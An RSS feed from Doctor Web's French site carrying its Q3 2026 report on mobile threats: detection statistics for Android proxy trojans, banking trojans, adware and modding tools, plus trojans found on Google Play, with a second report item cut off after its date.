<?xml version="1.0"?>
<rss version="2.0"><channel><title>Toutes les actualités</title><link>https://news.drweb.fr/news/</link><description>Toutes les actualités de Doctor Web
 - Toutes les actualités</description><image><url>https://st.drweb.com/static/drweb_logo_fr.gif</url><link>https://news.drweb.fr/news/</link><title>Dr.Web anti-virus</title></image><item><guid>https://news.drweb.fr/show/?i=15305&amp;lng=fr</guid><title>Doctor Web : rapport viral sur les menaces pour appareils mobiles 3e trimestre 2026</title><link>https://news.drweb.fr/show/?i=15305&amp;lng=fr&amp;c=5</link><pubDate>Thu, 01 Oct 2026 07:00:00 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Selon les statistiques de détection de Dr.Web Security Space pour les appareils mobiles, le troisième trimestre 2026 a connu une forte augmentation de l'activité des applications de type cheval de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Proxy&amp;lng=fr"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;, qui permettent aux cybercriminels de rediriger le trafic réseau via les appareils des victimes et d'anonymiser leur connexion Internet. Cette croissance était principalement due aux chevaux de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Proxy&amp;lng=fr"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.60.origin&lt;/b&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.Proxy&amp;lng=fr"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.61.origin&lt;/b&gt;, qui représentaient à eux deux plus de 22&amp;nbsp;% de toutes les détections de logiciels malveillants. Ils ajoutent des appareils infectés à des réseaux de bots proxy et transforment chacun d'eux en un nœud de sortie pour le réseau proxy correspondant.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Par rapport au deuxième trimestre, le nombre d'attaques par les chevaux de Troie bancaires &lt;a href="https://vms.drweb.fr/search/?q=Android.Banker&amp;lng=fr"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; a légèrement augmenté, et ces applications malveillantes occupent la deuxième place avec une part de 18,06&amp;nbsp;%. Comme auparavant, les plus actifs d'entre eux étaient des représentants de la sous-famille &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, capables, entre autres, d'intercepter le contenu des SMS et des notifications afin de voler les codes de confirmation à usage unique des transactions bancaires.&lt;/p&gt;

&lt;p&gt;Dans le même temps, les utilisateurs sont de moins en moins confrontés aux chevaux de Troie publicitaires des familles &lt;a href="https://vms.drweb.fr/search/?q=Android.MobiDash&amp;lng=fr"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. Au cours des trois derniers mois le nombre de détections de ces menaces a de nouveau diminué, de 30,96&amp;nbsp;% et 14,36&amp;nbsp;% respectivement, et leur part totale parmi les logiciels malveillants détectés ne dépasse actuellement pas 10&amp;nbsp;%.&lt;/p&gt;

&lt;p&gt;Parmi les logiciels potentiellement dangereux, les détections concernent principalement des programmes dans lesquels du code indésirable a été ajouté à l'aide d'outils de modification par des pirates informatiques comme NP Manager, obscurcissant ainsi la logique de l'application. Les auteurs de virus utilisent cette fonctionnalité pour protéger les logiciels malveillants contre la détection par les logiciels antivirus. Elle est notamment utilisé pour protéger contre les chevaux de Troie bancaires &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;. Au troisième trimestre, ces modifications (détectées comme &lt;a href="https://vms.drweb.fr/search/?q=Tool.Obfuscator.TrashCode&amp;lng=fr"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;) représentaient 69,01&amp;nbsp;% de l’ensemble des détections d'applications potentiellement dangereuses.
&lt;/p&gt;

&lt;p&gt;La deuxième place est à nouveau occupée par les programmes modifiés à l'aide d'autres fonctionnalités de NP Manager. Les cybercriminels peuvent notamment utiliser cet outil pour obfusquer le code d'un cheval de Troie afin de compliquer sa détection et son analyse. Les modifications de ce type (détectés sous le nom de &lt;a href="https://vms.drweb.fr/search/?q=Tool.NPMod&amp;lng=fr"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;) représentaient 19,16&amp;nbsp;% du nombre total des détections de logiciels potentiellement dangereux. Ce trio de tête est complété par des programmes modifiés à l'aide de l'utilitaire &lt;a href="https://vms.drweb.fr/search/?q=Tool.LuckyPatcher&amp;lng=fr"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;. Cet utilitaire télécharge sur Internet des scripts spécialement conçus, susceptibles de représenter une menace car ils peuvent être créés par n'importe qui, y compris des auteurs de virus. Les programmes modifiés de cette manière ont été à l'origine de 5,77&amp;nbsp;% des détections.
&lt;/p&gt;

&lt;p&gt;Au troisième trimestre, les applications indésirables les plus courantes sont restées &lt;a href="https://vms.drweb.fr/search/?q=Program.FakeAntiVirus&amp;lng=fr"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, des programmes imitant les logiciels antivirus. Ces programmes informent les utilisateurs qu'ils ont détecté certaines menaces et leur proposent d'acheter la version complète pour «&amp;nbsp;désinfecter&amp;nbsp;» le système. La part de ce type de logiciel parmi le nombre total de détections de programmes indésirables par rapport à la période d'observation précédente est passée de 44,10&amp;nbsp;% à 51,09&amp;nbsp;%.
&lt;/p&gt;

&lt;p&gt;Le logiciel publicitaire le plus courant a été présenté par des modules &lt;a href="https://vms.drweb.fr/search/?q=Adware.AdPush&amp;lng=fr"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt; pouvant être intégrés aux applications Android. Au troisième trimestre, ils représentaient 39,46&amp;nbsp;% des détections de ce type de menace. Ces modules affichent des notifications publicitaires trompeuses. Ils collectent également diverses données confidentielles.&lt;/p&gt;

&lt;p&gt;Au cours des trois derniers mois, l'activité des modules publicitaires &lt;a href="https://vms.drweb.fr/search/?q=Adware.Airpush&amp;lng=fr"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt; a augmenté – leur part est passée de 7,39&amp;nbsp;% à 10,34&amp;nbsp;%. Les modifications les plus courantes sont &lt;a href="https://vms.drweb.fr/search/?q=Adware.Airpush&amp;lng=fr"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;. Les modules &lt;a href="https://vms.drweb.fr/search/?q=Adware.Airpush&amp;lng=fr"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt; peuvent afficher des notifications publicitaires, des bannières et des fenêtres contextuelles&amp;nbsp;; les cybercriminels les utilisent également pour diffuser des logiciels malveillants.&lt;/p&gt;

&lt;p&gt;Les utilisateurs ont continué à être confrontés aux programmes publicitaires &lt;b&gt;Adware.Opensite.15&lt;/b&gt;, mais leur activité a diminué par rapport au deuxième trimestre&amp;nbsp;: leur part est passée de 14,26&amp;nbsp;% à 7,90&amp;nbsp;%. Ces applications sont distribuées sous couvert de trucs et astuces pour obtenir diverses ressources dans les jeux, mais leur véritable fonction est de charger des sites web publicitaires. Les &lt;a href="https://vms.drweb.fr/search/?q=Adware.Bastion&amp;lng=fr"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;, qui figuraient parmi les logiciels publicitaires les plus fréquemment détectés ces derniers mois, ont également été moins présents. Ces applications ont représenté 5,73% des détections. Ces programmes généraient des notifications contenant des messages trompeurs concernant de prétendues erreurs système et une mémoire vive insuffisante. Et pendant la phase d’«&amp;nbsp;optimisation&amp;nbsp;», ils diffusent des publicités.
&lt;/p&gt;

&lt;p&gt;Au cours du troisième trimestre, le laboratoire antivirus de Doctor Web a détecté de nombreuses nouvelles applications malveillantes sur Google Play, dont des dizaines de chevaux de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; qui abonnent les utilisateurs à des services mobiles payants. De plus, lors de l'analyse de ces chevaux de Troie, nos experts ont découvert que leurs auteurs avaient étendu les fonctionnalités de cette famille de logiciels malveillants. Certaines modifications d'&lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; sont désormais capables non seulement de créer des abonnements, mais également t de transformer les appareils infectés en nœuds de sortie de botnet proxy. Des programmes contrefaits de la famille &lt;a href="https://vms.drweb.fr/search/?q=Android.FakeApp&amp;lng=fr"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, utilisés dans divers stratagèmes frauduleux, ont également été distribués sur Google Play.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Tendances principales du 3e trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Les utilisateurs ont fait face à une activité accrue du logiciel malveillant &lt;a href="https://vms.drweb.fr/search/?q=Android.Proxy&amp;lng=fr"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;, qui permet aux attaquants de rediriger le trafic réseau via les appareils des victimes.&lt;/li&gt;
        &lt;li&gt;On a constaté une augmentation du nombre d'attaques menées par les Trojans bancaires &lt;a href="https://vms.drweb.fr/search/?q=Android.Banker&amp;lng=fr"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;.&lt;/li&gt;
        &lt;li&gt;L'activité des chevaux de Troie publicitaires &lt;a href="https://vms.drweb.fr/search/?q=Android.MobiDash&amp;lng=fr"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; a continué de diminuer.&lt;/li&gt;
        &lt;li&gt;Des dizaines de programmes malveillants ont été détectés sur Google Play.&lt;/li&gt;
        &lt;li&gt;Les chevaux de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; ont acquis une fonctionnalité permettant aux appareils infectés de devenir des nœuds de sortie de botnets proxy.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Selon les données obtenues par Dr.Web Security Space pour les appareils mobiles&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/01_malware_q3_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/01_malware_q3_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Android.Proxy&amp;lng=fr"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.60.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Android.Proxy&amp;lng=fr"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.61.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programmes malveillants qui transforment les appareils infectés en nœuds de sortie de botnets proxy et permettent aux attaquants de rediriger le trafic réseau à travers eux.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.SpyMax.17&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Logiciel espion malveillant doté de nombreuses fonctionnalités. Les cybercriminels l'utilisent notamment comme cheval de Troie bancaire pour intercepter les SMS contenant les codes de vérification envoyés par les établissements de crédit.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4236&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Trojan qui est conçu pour afficher des publicités. Les représentant de la famille &lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; sont souvent diffusés sous couvert d'applications inoffensives et, dans certains cas, sont installés dans le répertoire système par d'autres malwares. Une fois sur les appareils Android, ces chevaux de Troie publicitaires dissimulent généralement leur présence dans le système, notamment en masquant l'icône de l'application dans le menu de l'écran d'accueil.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Banker.Mamont.263.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Cheval de Troie bancaire qui intercepte les SMS contenant des codes à usage unique provenant d'établissements de crédit, le contenu des notifications et collecte d'autres informations confidentielles. Ces informations comprennent des données techniques sur l'appareil infecté, une liste des applications installées, des informations sur la carte SIM, les appels téléphoniques, les SMS reçus et envoyés.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/02_unwanted_q3_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/02_unwanted_q3_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Program.FakeAntiVirus&amp;lng=fr"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Program.FakeAntiVirus&amp;lng=fr"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Program.FakeAntiVirus&amp;lng=fr"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programmes publicitaires imitant le fonctionnement des logiciels antivirus. Ces applications peuvent induire les utilisateurs en erreur en signalant des menaces inexistantes ou en identifiant à tort des applications sûres comme malveillantes. Dans certains cas, elles peuvent exiger des utilisateurs l'achat de la version complète du logiciel pour «&amp;nbsp;traiter&amp;nbsp;» les menaces prétendument détectées.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Program.FakeMoney&amp;lng=fr"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Applications qui prétendent permettre de gagner de l'argent en accomplissant certaines actions ou tâches. Elles imitent l'accumulation de récompenses, mais le retrait de l'argent «&amp;nbsp;gagné&amp;nbsp;», n’est possible qu’après avoir atteint un certain montant. Elles proposent généralement une liste de systèmes de paiement et de banques populaires par lesquels les récompenses pourraient prétenduement être retirées. Cependant, même lorsque les utilisateurs parviennent à accumuler un montant suffisant pour le retrait, les paiements promis n'arrivent pas. Cette entrée de la base détecte également d'autres logiciels indésirables basés sur le code de tels programmes.&lt;/dd&gt;
    
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Program.CloudInject&amp;lng=fr"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Détection des applications Android modifiées à l'aide du service CloudInject et de l'utilitaire Android du même nom (ajouté à la base de données de virus Dr.Web sous le nom de &lt;a href="https://vms.drweb.fr/search/?q=Tool.CloudInject&amp;lng=fr"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Ces programmes sont modifiés sur un serveur distant, tandis que l'utilisateur (moddeur) intéressé à les changer ne contrôle pas ce qui y sera intégré. De plus, les applications reçoivent un ensemble d'autorisations dangereuses. Après la modification, l'utilisateur qui fait du modding (moddeur) reçoit une possibilité de contrôler à distance ces programmes&amp;nbsp;— les bloquer, afficher des boîtes de dialogue personnalisées, suivre l'installation et de désinstaller d'autres logiciels, etc.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/03_riskware_q3_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/03_riskware_q3_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Tool.Obfuscator.TrashCode&amp;lng=fr"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Tool.Obfuscator.TrashCode&amp;lng=fr"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Détection des applications Android ayant subi une injection de code malveillant à l'aide d'outils de modding d'applications utilisés par des pirates informatiques. Cette modification vise à masquer la logique du programme. Cette technique est fréquemment utilisée dans les chevaux de Troie bancaires et les versions piratées de logiciels.&lt;/dd&gt;

     &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
     &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
     &lt;dd&gt;Détection des applications Android modifiées à l'aide de l'utilitaire NP Manager. Cet utilitaire contient divers modules permettant d'obfusquer et de protéger le code du programme, ainsi que de contourner la vérification de leur signature numérique après modification. L'obfuscation qu'elle ajoute est souvent utilisée dans les logiciels malveillants pour les rendre plus difficiles à détecter et à analyser.&lt;/dd&gt;

     &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Tool.LuckyPatcher&amp;lng=fr"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
     &lt;dd&gt;Utilitaire qui permet de modifier les applications Android installées (créer des correctifs pour elles) afin de changer la logique de leur fonctionnement ou de contourner certaines restrictions. Avec son aide, les utilisateurs peuvent essayer de désactiver la vérification de l'accès root dans les programmes bancaires ou obtenir des ressources illimitées dans les jeux. Pour créer des correctifs, l'utilitaire télécharge des scripts spécialement préparés sur Internet, que n'importe qui peut créer et ajouter à la base de données commune. La fonctionnalité de ces scripts peut également être malveillante, c'est pourquoi les correctifs créés peuvent constituer un danger potentiel.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/04_adware_q3_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/04_adware_q3_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Adware.AdPush&amp;lng=fr"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Adware.Adpush&amp;lng=fr"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Modules publicitaires intégrables dans les applications Android. Ils affichent des publicités qui induisent les utilisateurs en erreur. Par exemple, ces notifications peuvent ressembler aux messages du système d'exploitation. De plus, ces modules collectent un certain nombre de données confidentielles, et sont également capables de télécharger d'autres applications et d'initier leur installation.&lt;/dd&gt;

     &lt;dt&gt;&lt;b&gt;Adware.Opensite.15&lt;/b&gt;&lt;/dt&gt;
     &lt;dd&gt;Des applications déguisées en outils de triche pour obtenir des ressources dans les jeux. En réalité, elles sont conçues pour afficher des publicités. Ces programmes reçoivent une configuration d'un serveur distant, selon laquelle ils chargent un site web cible avec des publicités (bannières, pop-ups, vidéos, etc.).&lt;/dd&gt;

     &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Adware.Airpush&amp;lng=fr"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
     &lt;dd&gt;Modules publicitaires qui sont intégrés dans des applications Android et affichent différentes publicités. Selon leur version et modification, il peut s'agir de publicités, de pop-ups ou de bannières. A l'aide de ces modules, les pirates distribuent souvent des malwares en proposant d'installer des applications. De plus, de tels modules transmettent diverses informations confidentielles à un serveur distant.&lt;/dd&gt;
     &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Adware.Bastion&amp;lng=fr"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
     &lt;dd&gt;Détection des programmes d'optimisation qui créent périodiquement des notifications contenant des messages trompeurs concernant une mémoire insuffisante et des erreurs système supposées, afin d'afficher des publicités pendant «&amp;nbsp;l'optimisation&amp;nbsp;».&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Menaces sur Google Play&lt;/h3&gt;

&lt;p&gt;Au troisième trimestre 2026, les analystes de Doctor Web ont détecté plus de 50 applications malveillantes sur Google Play. La plupart appartenaient à la famille des chevaux de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, qui abonnent secrètement les utilisateurs à des services mobiles payants. Pour ce faire, ils volent des codes de vérification à usage unique, interceptant le contenu des SMS et des notifications. Les auteurs de virus ont distribué des chevaux de Troie sous le couvert de divers logiciels, notamment des messageries instantanées, des utilitaires permettant d'optimiser le fonctionnement des appareils, des programmes d'appareil photo, des outils de reconnaissance de texte et des lecteurs multimédias permettant de visionner en ligne des films et des séries télévisées.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/05_Android.Joker.2679_1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/05_Android.Joker.2679_1.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/06_Android.Joker.2682_1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/06_Android.Joker.2682_1.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Exemples d'applications sur Google Play hébergeant des chevaux de Troie &lt;b&gt;Android.Joker&lt;/b&gt;&amp;nbsp;: Special Camera&amp;nbsp;— &lt;b&gt;Android.Joker.2679&lt;/b&gt;, Color Messages&amp;nbsp;— &lt;b&gt;Android.Joker.2682&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Lors de l'examen de nouveaux échantillons d'&lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, nos experts ont découvert que certains d'entre eux avaient été modifiés pour inclure une fonctionnalité permettant de transformer les appareils infectés en nœuds de sortie de botnet proxy. Les attaquants peuvent utiliser cette fonctionnalité pour vendre des services d'accès à Internet via le réseau de leurs victimes.
&lt;/p&gt;

&lt;p&gt;L'analyse a révélé que l'un des serveurs de commande et de contrôle du botnet n'était pas protégé par une procédure d'authentification. Grâce à cela, les analystes antivirus de Doctor Web ont pu obtenir du panneau de contrôle des informations sur ses statistiques de fonctionnement, ainsi que des informations sur les applications contenant des modules malveillants &lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;. À la fin du mois d'août, plus de 187 000 appareils avaient été infectés par les chevaux de Troie mis à jour de la famille, et le nombre de locataires actifs du réseau proxy illégal atteignait 93. 
&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/07_Android.Joker_proxy_stat.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/07_Android.Joker_proxy_stat.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;em&gt;Un panneau de contrôle web pour un réseau de bots proxy fonctionnant sur des appareils infectés par certaines variantes d'&lt;b&gt;Android.Joker&lt;/b&gt;.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Parmi les autres menaces identifiées figurent de nouvelles variantes du cheval de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.FakeApp&amp;lng=fr"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, capables de charger divers sites web, notamment des sites malveillants et frauduleux. Ils étaient distribués sous couvert de programmes de gestion des finances et de planification du budget familial, de prise de notes, de programmes de recherche d'emploi, ainsi que de jeux divers. La plupart des chevaux de Troie offraient effectivement la fonctionnalité annoncée pour se dissimuler, mais dans certaines conditions, à la place de la fonctionnalité déclarée, les programmes malveillants chargeaient des sites web frauduleux.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/08_Android.FakeApp_1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/08_Android.FakeApp_1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;em&gt;Exemples de logiciels malveillants &lt;b&gt;Android.FakeApp&lt;/b&gt;, que nos experts ont trouvés sur Google Play au troisième trimestre 2026&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Par exemple, &lt;a href="https://vms.drweb.fr/search/?q=Android.FakeApp&amp;lng=fr"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2022&lt;/b&gt; chargeait un site web qui affichait une liste de «&amp;nbsp;postes vacants actuels&amp;nbsp;» avec des salaires élevés et des conditions de travail attrayantes. 
Dans le même temps, la conception de la ressource Internet frauduleuse utilisait un logo conçu dans le style et les couleurs du logo officiel du portail russe «&amp;nbsp;Gosuslugi&amp;nbsp;». 
&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/09_Android.FakeApp_job1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/09_Android.FakeApp_job1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;em&gt;L'une des offres d'emploi prétendument proposées à une victime potentielle.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Les utilisateurs étaient invités à consulter les offres d’emploi qui les intéressaient. Pour ce faire, ils devaient soumettre une candidature, après quoi ils pouvaient soi-disant «&amp;nbsp;commencer à gagner de l'argent dès aujourd'hui&amp;nbsp;». Les escrocs leur demandaient des informations confidentielles, notamment le nom, le prénom, l'âge, la nationalité et le numéro de téléphone portable, et leur proposaient de choisir un créneau pour être rappelés par un «&amp;nbsp;spécialiste&amp;nbsp;».&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/10_Android.FakeApp_job2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_mobile_q3/10_Android.FakeApp_job2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;em&gt;Le site web, infecté par un cheval de Troie, collecte des données personnelles que les escrocs peuvent ensuite utiliser pour tromper leurs victimes.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Pour protéger vos appareils Android contre les applications malveillantes et indésirables, nous vous recommandons d’installer les produits antivirus &lt;a href="https://products.drweb.fr/mobile/android/" target="_blank"&gt;Dr.Web pour Android.&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q3%202026%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicateurs de compromission&lt;/a&gt;&lt;/p&gt;

</description></item><item><guid>https://news.drweb.fr/show/?i=15304&amp;lng=fr</guid><title>Doctor Web : rapport viral du 3e trimestre 2026</title><link>https://news.drweb.fr/show/?i=15304&amp;lng=fr&amp;c=5</link><pubDate>Thu, 01 Oct 2026 01:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;le 1er octobre 2026&lt;/b&gt;&lt;/p&gt;

